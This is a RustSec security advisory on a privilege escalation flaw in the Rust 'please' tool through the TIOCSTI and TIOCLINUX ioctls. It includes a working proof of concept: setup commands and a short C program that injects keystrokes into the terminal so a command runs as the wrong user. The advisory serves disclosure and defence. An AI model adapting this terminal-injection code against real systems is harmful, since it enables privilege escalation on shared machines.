```toml
[advisory]
id = "RUSTSEC-2023-0066"
package = "pleaser"
aliases = ["CVE-2023-46277", "GHSA-cgf8-h3fp-h956"]
date = "2023-04-29"
url = "https://gitlab.com/edneville/please/-/issues/13"
categories = ["privilege-escalation"]
keywords = []
cvss = "CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N"

[versions]
patched = []

[affected]
```

# Vulnerable to privilege escalation using ioctls TIOCSTI and TIOCLINUX

please is vulnerable to privilege escalation using ioctls TIOCSTI
and TIOCLINUX on systems where they are not disabled.

Here is how to see it in action:

```
$ cd "$(mktemp -d)"
$ git clone --depth 1 https://gitlab.com/edneville/please.git
$ cd please/
$ git rev-parse HEAD  # f3598f8fae5455a8ecf22afca19eaba7be5053c9
$ cargo test && cargo build --release
$ echo "[${USER}_as_nobody]"$'\nname='"${USER}"$'\ntarget=nobody\nrule=.*\nrequire_pass=false' | sudo tee /etc/please.ini
$ sudo chown root:root ./target/release/please
$ sudo chmod u+s ./target/release/please
$ cat <<TIOCSTI_C_EOF | tee TIOCSTI.c
#include <sys/ioctl.h>

int main(void) {
  const char *text = "id\n";
  while (*text)
    ioctl(0, TIOCSTI, text++);
  return 0;
}
TIOCSTI_C_EOF
$ gcc -std=c99 -Wall -Wextra -pedantic -o /tmp/TIOCSTI TIOCSTI.c
$ ./target/release/please -u nobody /tmp/TIOCSTI  # runs id(1) as ${USER} rather than nobody
```

Please note that:

This affects both the case where root wants to drop privileges as well when non-root wants to gain other privileges.
